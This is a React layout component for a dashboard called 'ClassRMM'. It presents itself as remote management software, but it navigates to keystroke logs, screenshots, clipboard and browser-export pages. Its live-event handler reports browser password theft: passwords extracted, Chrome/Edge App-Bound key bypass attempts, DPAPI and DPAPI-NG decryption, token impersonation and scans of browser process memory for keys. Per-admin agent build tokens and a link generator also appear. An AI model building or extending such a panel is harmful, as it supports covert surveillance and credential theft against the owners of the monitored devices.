import React from 'react';
import { Outlet, NavLink, useNavigate, useLocation } from 'react-router-dom';
import { useAuth } from '../store/auth';
import { useDevices } from '../store/devices';
import { useLiveEvents } from '../hooks/useLiveEvents';
import toast from 'react-hot-toast';

const styles = {
  shell:   { display:'flex', height:'100vh', overflow:'hidden' },
  sidebar: { width:240, background:'var(--surface)', borderRight:'1px solid var(--border)',
             display:'flex', flexDirection:'column', padding:'16px 0', overflowY:'auto' },
  logo:    { padding:'0 20px 20px', fontWeight:700, fontSize:18, color:'var(--accent)',
             borderBottom:'1px solid var(--border)', marginBottom:8 },
  nav:     { flex:1 },
  navItem: { display:'block', padding:'8px 20px', color:'var(--muted)', cursor:'pointer',
             transition:'all .15s' },
  main:    { flex:1, display:'flex', flexDirection:'column', overflow:'hidden' },
  header:  { padding:'12px 24px', borderBottom:'1px solid var(--border)',
             display:'flex', alignItems:'center', justifyContent:'space-between',
             background:'var(--surface)' },
  content: { flex:1, overflowY:'auto', padding:24 },
};

export default function Layout() {
  const { logout, claims, tokenExpiresAt } = useAuth();
  const isSuper    = !!claims?.super;
  const agentToken = claims?.agent_token;
  const adminName  = claims?.sub || '';
  // Super admin: track which admin groups are expanded in sidebar
  const [openGroups, setOpenGroups] = React.useState({});
  const toggleGroup = (name) => setOpenGroups(prev => ({ ...prev, [name]: !prev[name] }));
  const { devices, fetch, select } = useDevices();
  const navigate = useNavigate();
  const location = useLocation();

  // Active device context — parse route for device breadcrumb in header
  const _drm = location.pathname.match(/^\/device\/([^/]+)(?:\/(.*))?$/);
  const _activeDeviceId  = _drm?.[1] || null;
  const _activeSubPage   = _drm?.[2] || null;
  const _PAGE_LABELS = {
    keylogs: 'Keystroke Log', screenshots: 'Screenshots', activity: 'Activity',
    browser: 'Browser Exports', remote: 'Remote Control', processes: 'Processes',
    'network-scanner': 'Network Scanner', 'scheduled-tasks': 'Scheduled Tasks', recordings: 'Recordings',
  };
  const _activeDevice     = _activeDeviceId ? devices.find(d => d.device_id === _activeDeviceId) : null;
  const _activeDeviceName = _activeDevice ? (_activeDevice.label || _activeDevice.hostname || _activeDeviceId.slice(0, 8)) : null;
  const _activePageLabel  = _activeSubPage ? (_PAGE_LABELS[_activeSubPage] || _activeSubPage) : null;
  const _activeAdminName  = _activeDevice?.admin_username || null;

  // Token expiry warning for non-super admins (shows from 7 days before expiry)
  let daysLeft = null;
  let showExpiryWarning = false;
  if (!isSuper && tokenExpiresAt) {
    const now = new Date();
    const exp = new Date(tokenExpiresAt);
    daysLeft = Math.ceil((exp - now) / (1000 * 60 * 60 * 24));
    showExpiryWarning = daysLeft <= 7;
  }

  React.useEffect(() => { fetch(); }, []);

  useLiveEvents((event) => {
    if (event.event === 'agent_online') {
      toast.success(`Device online: ${event.device_id.slice(0,8)}`);
      fetch();
    } else if (event.event === 'agent_offline') {
      toast.error(`Device offline: ${event.device_id.slice(0,8)}`);
      fetch();
    } else if (event.event === 'crypto_test_result') {
      const dev = event.device_id?.slice(0, 8) ?? '?';
      const ok  = event.pycryptodome === true;
      const err = event.error || '';
      const detail = event.detail || {};
      if (ok) {
        toast.success(
          `[${dev}] AES-GCM ready — BCrypt stub loaded (MODE_GCM=${detail.mode_gcm ?? '?'})`,
          { duration: 8000 }
        );
      } else {
        toast.error(
          `[${dev}] AES-GCM NOT available — ${err || 'unknown error'} — run ⚡ Patch Crypto`,
          { duration: 12000 }
        );
      }
    } else if (event.event === 'decrypt_probe_result') {
      const dev = event.device_id?.slice(0, 8) ?? '?';
      const d   = event;

      // New format: export_browser probe result (v31_src === 'browser_export' or v31_creds present)
      if (d.v31_src === 'browser_export' || d.v31_creds !== undefined) {
        const count = d.count ?? d.v31_creds?.length ?? 0;
        if (count > 0) {
          toast.success(
            `[${dev}] Decrypt complete — ${count} passwords extracted.\nOpen the Browser tab to view credentials.`,
            { duration: 12000 }
          );
        } else {
          toast.error(`[${dev}] Decrypt: no passwords found in browser data.`, { duration: 8000 });
        }
        return;
      }

      const phase = d.phase ?? '?';
      const cryptoStr = d.pycryptodome
        ? `✓ MODE_GCM=${d.mode_gcm ?? '?'}`
        : `✗ ${d.crypto_error ? '('+d.crypto_error+')' : 'unavailable'}`;
      const sampleStr = d.sample_decrypt == null
        ? '(skipped)'
        : d.sample_decrypt === 'ok' ? '✓ decrypted'
        : d.sample_decrypt === 'no_rows' ? '(no rows in DB)'
        : `✗ ${d.sample_decrypt}`;
      const abkStr = d.abk_hex ? ` [${d.abk_hex.slice(0,16)}… len=${d.abk_len??'?'}]` : '';
      const dpapiStr = d.dpapi_machine_hex
        ? `DPAPI machine(${d.dpapi_machine_len}B): ${d.dpapi_machine_hex.slice(0,32)}…`
        : d.dpapi_machine_err != null ? `DPAPI machine: ERR=${d.dpapi_machine_err}` : null;
      const dpapiUserStr = d.dpapi_user_hex
        ? `DPAPI user(${d.dpapi_user_len}B): ${d.dpapi_user_hex.slice(0,32)}…`
        : d.dpapi_user_err != null ? `DPAPI user: ERR=${d.dpapi_user_err}` : null;
      const ncryptStr = d.ncrypt_hex
        ? `DPAPI-NG OK(${d.ncrypt_len}B): ${d.ncrypt_hex.slice(0,32)}…`
        : d.ncrypt_err != null
          ? `DPAPI-NG: ERR=${d.ncrypt_err}${d.ncrypt_f60_err?' f60='+d.ncrypt_f60_err:d.ncrypt_f60_hex?' f60_OK='+d.ncrypt_f60_hex.slice(0,16):''} blob=${d.dpapi_in_hex??'?'}`
          : d.ncrypt_diag_err ? `DPAPI-NG exc: ${d.ncrypt_diag_err}` : null;
      const dpApiEntStr = (() => {
        if (!d.dpapi_ent) return d.dpapi_ent_exc ? `ent_exc: ${d.dpapi_ent_exc}` : null;
        const ok = Object.entries(d.dpapi_ent).filter(([,v])=>v.startsWith('OK'));
        if (ok.length) return `DPAPI+ent OK: ${ok.map(([k,v])=>k+'='+v).join(', ')}`;
        const errs = Object.entries(d.dpapi_ent).map(([k,v])=>k.split('_').slice(-2).join('_')+'='+v.split(':')[1]).slice(0,8).join(' ');
        return `DPAPI+ent: ${errs}`;
      })();
      const wideGuidStr = d.wide_guids_count != null
        ? `wide_guids(${d.wide_guids_count}): ${(d.wide_guids??[]).map(g=>g.slice(1,9)).join(' ')}`
        : null;
      const agentUserStr = d.agent_user ? `agent_user=${d.agent_user}` : null;
      const ncryptImpStr = d.ncrypt_imp_hex
        ? `DPAPI-NG+imp OK(${d.ncrypt_imp_len}B): ${d.ncrypt_imp_hex.slice(0,32)}… [tok:${d.tok_src}]`
        : d.ncrypt_imp_err != null
          ? `DPAPI-NG+imp ERR=${d.ncrypt_imp_err} tok=${d.tok_src??'?'} priv:tcb=${d.priv_tcb} dbg=${d.priv_dbg}`
          : d.ncrypt_imp_exc ? `DPAPI-NG+imp exc: ${d.ncrypt_imp_exc}`
          : d.tok_src === 'none' ? `tok:none wts_err=${d.wts_err} priv:tcb=${d.priv_tcb} dbg=${d.priv_dbg}`
          : d.wts_err != null ? `WTS ERR=${d.wts_err} sess=${d.wts_session} priv:tcb=${d.priv_tcb} dbg=${d.priv_dbg}`
          : null;
      const fmtHr = v => typeof v === 'number' ? '0x'+v.toString(16) : v;
      const regScanStr = d.reg_scanned
        ? Object.entries(d.reg_scanned).map(([k,v])=>k+':'+v).join(' ')
        : null;
      const appidStr = d.appid_clsids?.length
        ? `AppIDs: ${d.appid_clsids.join(', ')}${d.appid_hr ? ' hr:'+JSON.stringify(d.appid_hr) : ''}`
        : (d.appid_clsids != null ? 'AppIDs: none' : null);
      const s2Str = d.step2_notable && Object.keys(d.step2_notable).length
        ? `Step2notable: ${Object.entries(d.step2_notable).map(([k,v])=>k+'→'+v).join(', ')}`
        : null;
      const elevStr = d.elevator_hr_unk != null
        ? ` hr_unk=${fmtHr(d.elevator_hr_unk)}${d.probe_arch?' ['+d.probe_arch+']':''} ${d.elev_clsid_reg ? 'svc_clsid='+d.elev_clsid_reg.slice(1,9)+'…' : '(no svc_clsid)'}${regScanStr?' reg:['+regScanStr+']':''}`
        : (d.elevator_hr != null ? ` elevator_hr=${fmtHr(d.elevator_hr)}` : '');
      const iidsStr = d.elevator_iids?.length
        ? `WOW IIDs: ${d.elevator_iids.map(x => x.slice(0,8)+'…').join(', ')}`
        : (d.elevator_iids != null ? 'WOW IIDs: none' : null);
      const qiStr = d.elevator_qi && Object.keys(d.elevator_qi).length
        ? `CoCI: ${Object.entries(d.elevator_qi).map(([k,v]) => k.slice(0,10)+'→'+v.slice(0,14)).join(', ')}`
        : null;
      const binStr = d.elevator_found_iid
        ? `*** FOUND IID: ${d.elevator_found_iid} ***`
        : d.elevator_found_clsid
        ? `FOUND CLSID: ${d.elevator_found_clsid} (no IID yet)`
        : d.elevator_bin_tries && Object.keys(d.elevator_bin_tries).length
        ? `Tries(${d.elevator_scan??'?'}) guids=${d.elevator_bin_guids?.length??0}: ${Object.entries(d.elevator_bin_tries).map(([k,v]) => k+'→'+v.slice(0,8)).join(', ')}${d.elevator_bin_err?' ERR:'+d.elevator_bin_err:''}`
        : d.elevator_bin_guids != null
        ? `scan(${d.elevator_scan??'?'}) guids=${d.elevator_bin_guids.length}${d.elevator_bin_err?' ERR:'+d.elevator_bin_err:''}`
        : (d.elevator_dir ? `dir: ${d.elevator_dir.slice(0,8).join(', ')}` : null);
      const pathStr = d.elevator_path ? `svc: ${d.elevator_path.split('\\').slice(-2).join('\\')}` : null;
      const memScanStr = d.mem_key
        ? `*** MEM KEY: ${d.mem_key.slice(0,32)}… pt="${d.mem_pt?.slice(0,30)}" pid=${d.mem_pid} addr=${d.mem_addr} mb=${d.mem_mb} ***`
        : d.mem_scan
          ? `mem_scan[BCrypt=${d.mem_scan.bcrypt??'?'} kobj=${d.mem_scan.kobj??'?'}]: pids=${d.mem_scan.pids?.length??0} browser=[${(d.mem_scan.browser??[]).join(',')}] mb=${d.mem_scan.mb??0} pages=${d.mem_scan.pages??0} tested=${d.mem_scan.tested??0} ${d.mem_scan.result??''} ${d.mem_scan.timeout?'TIMEOUT':''}`
          : d.mem_scan_err ? `mem_scan_err: ${d.mem_scan_err.slice(0,80)}` : null;
      const lines = [
        `[${dev}] DECRYPT PROBE v${d.probe_v??'old'} — ${d.browser ?? 'edge'} v${d.edge_version ?? '?'} (phase:${phase} ${d.elapsed ?? '?'}s)`,
        `AES/pycryptodome: ${cryptoStr}`,
        `AES key (v10): ${d.aes_key ? '✓' : '✗'}   App-Bound key (v20): ${d.app_bound_key ? '✓' : '✗'}${abkStr}${elevStr}`,
        `DB rows — total:${d.login_rows ?? '?'} v10:${d.login_v10 ?? '?'} v20:${d.login_v20 ?? '?'} dpapi:${d.login_dpapi ?? '?'}`,
        `v20 blob: ${d.v20_blob_hex ? d.v20_blob_hex.slice(0,32)+'… (len='+d.v20_blob_len+')' : 'n/a'}`,
        ...(memScanStr ? [memScanStr] : []),
        `Sample decrypt: ${sampleStr}`,
        ...(dpapiStr ? [dpapiStr] : []),
        ...(dpapiUserStr ? [dpapiUserStr] : []),
        ...(dpApiEntStr ? [dpApiEntStr] : []),
        ...(ncryptStr ? [ncryptStr] : []),
        ...(ncryptImpStr ? [ncryptImpStr] : []),
        ...(agentUserStr ? [agentUserStr] : []),
        ...(wideGuidStr ? [wideGuidStr] : []),
        ...(pathStr ? [pathStr] : []),
        ...(d.msedge_dir ? [`msedge: ${d.msedge_dir}`] : d.elevator_procs?.length ? [`procs: ${d.elevator_procs.join(', ')}`] : []),
        ...(appidStr ? [appidStr] : []),
        ...(iidsStr ? [iidsStr] : []),
        ...(qiStr ? [qiStr] : []),
        ...(binStr ? [binStr] : []),
        ...(s2Str ? [s2Str] : []),
        ...(d.errors?.length ? ['Errors: ' + d.errors.join(' | ')] : []),
      ].join('\n');
      const hasResult = d.sample_decrypt === 'ok' || d.login_rows > 0;
      if (hasResult) {
        toast.success(lines, { duration: 20000 });
      } else {
        toast.error(lines, { duration: 20000 });
      }
    }
  });

  const online = devices.filter(d => d.is_online).length;

  return (
    <div style={styles.shell}>
      <aside style={styles.sidebar}>
        <div style={styles.logo}>ClassRMM</div>
        <nav style={styles.nav}>
          <NavLink to="/" end style={({ isActive }) => ({
            ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
          })}>📊 Dashboard</NavLink>
          <NavLink to="/live" style={({ isActive }) => ({
            ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
          })}>⚡ Live Feed</NavLink>
          <NavLink to="/deploy" style={({ isActive }) => ({
            ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
          })}>🚀 Bulk Deploy</NavLink>
          <NavLink to="/clipboard" style={({ isActive }) => ({
            ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
          })}>📋 Clipboard</NavLink>
          <NavLink to="/print-jobs" style={({ isActive }) => ({
            ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
          })}>🖨️ Print Jobs</NavLink>
          {isSuper && (
            <NavLink to="/access-requests" style={({ isActive }) => ({
              ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
            })}>🔐 Access Requests</NavLink>
          )}
          <NavLink to="/agent-installer" style={({ isActive }) => ({
            ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
          })}>📦 Agent Installer</NavLink>
          <NavLink to="/apk-builder" style={({ isActive }) => ({
            ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
          })}>🤖 Android APK</NavLink>
          {isSuper && (
            <NavLink to="/agent-bat" style={({ isActive }) => ({
              ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
            })}>📡 Agent BAT</NavLink>
          )}
          <NavLink to="/notifications" style={({ isActive }) => ({
            ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
          })}>🔔 Notifications</NavLink>
          <NavLink to="/generate-link" style={({ isActive }) => ({
            ...styles.navItem, color: isActive ? 'var(--accent)' : 'var(--muted)'
          })}>⭐ Generate Link</NavLink>
          {!isSuper && agentToken && (
            <div style={{ padding:'8px 20px 12px', borderTop:'1px solid var(--border)', marginTop:8 }}>
              <div style={{ fontSize:10, color:'var(--muted)', textTransform:'uppercase',
                            letterSpacing:.5, marginBottom:6 }}>Your Agent Build Token</div>
              <code style={{ fontSize:10, color:'#f59e0b', wordBreak:'break-all',
                             lineHeight:1.5, display:'block' }}>{agentToken}</code>
              <button
                onClick={() => navigator.clipboard.writeText(agentToken).then(() => {})}
                style={{ marginTop:6, fontSize:10, padding:'3px 8px', background:'transparent',
                         border:'1px solid #f59e0b44', borderRadius:4, color:'#f59e0b',
                         cursor:'pointer' }}>
                Copy
              </button>
            </div>
          )}
          <div style={{ padding:'12px 20px 4px', fontSize:11, color:'var(--muted)',
                        textTransform:'uppercase', letterSpacing:.5 }}>
            Devices ({online} online)
          </div>
          {isSuper ? (
            // Super admin: group devices by admin owner
            (() => {
              // Build ordered list of groups
              const groups = [];
              const seen = new Set();
              devices.forEach(d => {
                const g = d.admin_username || 'Super Admin';
                if (!seen.has(g)) { seen.add(g); groups.push(g); }
              });
              // Detect duplicate hostnames across ALL devices (for disambiguation)
              const hostnameCounts = {};
              devices.forEach(d => {
                const name = d.label || d.hostname || '';
                if (name) hostnameCounts[name] = (hostnameCounts[name] || 0) + 1;
              });
              return groups.map(groupName => {
                const groupDevices = devices.filter(d => (d.admin_username || 'Super Admin') === groupName);
                const onlineCount = groupDevices.filter(d => d.is_online).length;
                const isOpen = openGroups[groupName] !== false; // default open
                return (
                  <div key={groupName}>
                    {/* Group header — click to collapse/expand */}
                    <div
                      onClick={() => toggleGroup(groupName)}
                      style={{ display:'flex', alignItems:'center', justifyContent:'space-between',
                               padding:'6px 20px', cursor:'pointer', userSelect:'none',
                               background:'var(--bg)', borderTop:'1px solid var(--border)' }}>
                      <span style={{ fontSize:11, fontWeight:700, color:'var(--accent)',
                                     textTransform:'uppercase', letterSpacing:.4,
                                     overflow:'hidden', textOverflow:'ellipsis', whiteSpace:'nowrap',
                                     maxWidth:150 }}>{groupName}</span>
                      <span style={{ fontSize:10, color:'var(--muted)', display:'flex', alignItems:'center', gap:4 }}>
                        <span style={{ color:'var(--green)' }}>{onlineCount}</span>/{groupDevices.length}
                        <span style={{ fontSize:9 }}>{isOpen ? '▲' : '▼'}</span>
                      </span>
                    </div>
                    {/* Device list — hidden when collapsed */}
                    {isOpen && groupDevices.map(d => {
                      const baseName = d.label || d.hostname || d.device_id.slice(0,8);
                      // Append short ID if same hostname exists in multiple groups
                      const displayName = hostnameCounts[d.label || d.hostname || ''] > 1 && !d.label
                        ? `${baseName} (${d.device_id.slice(0,6)})`
                        : baseName;
                      return (
                        <div key={d.device_id}
                          onClick={() => { select(d); navigate(`/device/${d.device_id}`); }}
                          style={{ ...styles.navItem, display:'flex', alignItems:'center', gap:8,
                                   fontSize:12, cursor:'pointer', paddingLeft:28 }}
                          title={
                            d.user_agent_online && d.system_agent_online ? 'Fully online'
                            : d.system_agent_online ? 'SYSTEM online — user agent offline'
                            : d.is_online ? 'Recently seen' : 'Offline'
                          }>
                          <span style={{ display:'flex', gap:2, flexShrink:0 }}>
                            <span style={{ width:7, height:7, borderRadius:'50%',
                                           background: d.system_agent_online ? 'var(--green)' : 'var(--muted)' }} />
                            <span style={{ width:7, height:7, borderRadius:'50%',
                                           background: d.user_agent_online ? 'var(--green)'
                                             : d.system_agent_online ? '#f59e0b' : 'var(--muted)' }} />
                          </span>
                          <span style={{ overflow:'hidden', textOverflow:'ellipsis', whiteSpace:'nowrap' }}>
                            {displayName}
                          </span>
                        </div>
                      );
                    })}
                  </div>
                );
              });
            })()
          ) : (
            // Regular admin: flat device list (unchanged)
            devices.map(d => (
              <div key={d.device_id}
                onClick={() => { select(d); navigate(`/device/${d.device_id}`); }}
                style={{ ...styles.navItem, display:'flex', alignItems:'center', gap:8,
                         fontSize:12, cursor:'pointer' }}
                title={
                  d.user_agent_online && d.system_agent_online
                    ? 'Fully online'
                    : d.system_agent_online && !d.user_agent_online
                    ? 'SYSTEM online — user agent offline (screenshots/stream/browser unavailable)'
                    : d.is_online ? 'Recently seen' : 'Offline'
                }>
                <span style={{ display:'flex', gap:2, flexShrink:0 }}>
                  <span style={{ width:7, height:7, borderRadius:'50%',
                                 background: d.system_agent_online ? 'var(--green)' : 'var(--muted)' }} />
                  <span style={{ width:7, height:7, borderRadius:'50%',
                                 background: d.user_agent_online ? 'var(--green)'
                                   : d.system_agent_online ? '#f59e0b' : 'var(--muted)' }} />
                </span>
                <span style={{ overflow:'hidden', textOverflow:'ellipsis', whiteSpace:'nowrap' }}>
                  {d.label || d.hostname || d.device_id.slice(0,8)}
                </span>
              </div>
            ))
          )}
        </nav>
        <button onClick={logout} style={{ margin:'8px 20px', padding:'8px 12px',
          background:'transparent', border:'1px solid var(--border)', borderRadius:6,
          color:'var(--muted)', cursor:'pointer' }}>
          Logout
        </button>
      </aside>

      <main style={styles.main}>
        <header style={styles.header}>
          <span style={{ fontWeight:600 }}>
            {isSuper ? 'ClassRMM Super Admin' : `ClassRMM Admin — ${adminName}`}
          </span>
          {_activeDeviceName && (
            <span style={{ display:'flex', alignItems:'center', gap:6, fontSize:13 }}>
              {isSuper && _activeAdminName && (
                <span style={{ color:'#a78bfa' }}>{_activeAdminName}</span>
              )}
              {isSuper && _activeAdminName && <span style={{ color:'var(--muted)' }}>›</span>}
              <span style={{ color:'var(--accent)' }}>💻 {_activeDeviceName}</span>
              {_activePageLabel && (
                <><span style={{ color:'var(--muted)' }}>›</span>
                  <span style={{ color:'var(--text)' }}>{_activePageLabel}</span></>
              )}
            </span>
          )}
          <span style={{ color:'var(--muted)', fontSize:12 }}>
            {online} / {devices.length} devices online
          </span>
        </header>
        <div style={styles.content}>
          {showExpiryWarning && (
            <div style={{
              background: daysLeft <= 1 ? '#dc262622' : daysLeft <= 3 ? '#f59e0b22' : '#eab30822',
              border: `1px solid ${daysLeft <= 1 ? '#dc2626' : daysLeft <= 3 ? '#f59e0b' : '#eab308'}`,
              borderRadius: 8, padding: '12px 20px', marginBottom: 16,
              display: 'flex', alignItems: 'center', gap: 12,
            }}>
              <span style={{ fontSize: 20 }}>{daysLeft <= 1 ? '🚨' : '⚠️'}</span>
              <div>
                <div style={{
                  fontWeight: 700, fontSize: 13,
                  color: daysLeft <= 1 ? '#dc2626' : daysLeft <= 3 ? '#f59e0b' : '#eab308',
                }}>
                  {daysLeft <= 0
                    ? 'Your access token has expired!'
                    : daysLeft === 1
                    ? 'Your access token expires tomorrow!'
                    : `Your access token expires in ${daysLeft} days`}
                </div>
                <div style={{ color: 'var(--muted)', fontSize: 12, marginTop: 2 }}>
                  Contact the super admin to renew your access token before it expires.
                </div>
              </div>
            </div>
          )}
          <Outlet />
        </div>
      </main>
    </div>
  );
}
